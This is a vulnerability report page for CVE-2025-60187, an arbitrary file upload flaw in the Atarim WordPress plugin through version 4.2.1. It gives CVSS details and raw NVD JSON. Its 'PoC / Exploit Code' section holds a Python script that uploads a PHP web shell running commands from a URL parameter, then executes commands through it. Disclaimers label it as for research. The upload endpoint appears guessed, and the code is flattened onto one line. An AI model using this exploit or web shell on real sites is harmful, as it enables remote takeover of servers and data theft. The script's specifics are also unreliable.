Security Vulnerability Report
中文
CVE-2025-60187 CVSS 4.8 MEDIUM

CVE-2025-60187

Published: 2025-11-06 16:16:03
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Unrestricted Upload of File with Dangerous Type vulnerability in Vito Peleg Atarim atarim-visual-collaboration allows Using Malicious Files.This issue affects Atarim: from n/a through <= 4.2.1.

CVSS Details

CVSS Score
4.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Atarim Visual Collaboration <= 4.2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-60187 PoC - Arbitrary File Upload in Atarim Plugin # Target: WordPress site with Atarim plugin <= 4.2.1 def upload_shell(target_url, php_payload): """ Upload malicious PHP file to target server """ upload_endpoint = f"{target_url}/wp-content/plugins/atarim-visual-collaboration/upload-handler.php" files = { 'file': ('shell.php', php_payload, 'application/x-php') } try: response = requests.post(upload_endpoint, files=files, timeout=10) if response.status_code == 200: # Parse response to get uploaded file path data = response.json() if 'url' in data or 'path' in data: uploaded_path = data.get('url') or data.get('path') print(f"[+] File uploaded successfully: {uploaded_path}") return uploaded_path print(f"[-] Upload failed. Status: {response.status_code}") return None except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return None def execute_command(target_url, cmd): """ Execute command via uploaded shell """ shell_url = f"{target_url}/wp-content/uploads/atarim/shell.php?cmd={cmd}" try: response = requests.get(shell_url, timeout=10) return response.text except: return None if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") sys.exit(1) target = sys.argv[1] # PHP WebShell payload php_shell = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>" print(f"[*] Attempting to upload shell to {target}...") uploaded = upload_shell(target, php_shell) if uploaded: print(f"[+] Shell uploaded! Access at: {uploaded}") print(f"[+] Example: {uploaded}?cmd=whoami")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60187", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:16:03.400", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Unrestricted Upload of File with Dangerous Type vulnerability in Vito Peleg Atarim atarim-visual-collaboration allows Using Malicious Files.This issue affects Atarim: from n/a through <= 4.2.1."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/atarim-visual-collaboration/vulnerability/wordpress-atarim-plugin-4-2-arbitrary-file-upload-vulnerability?_s_id=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.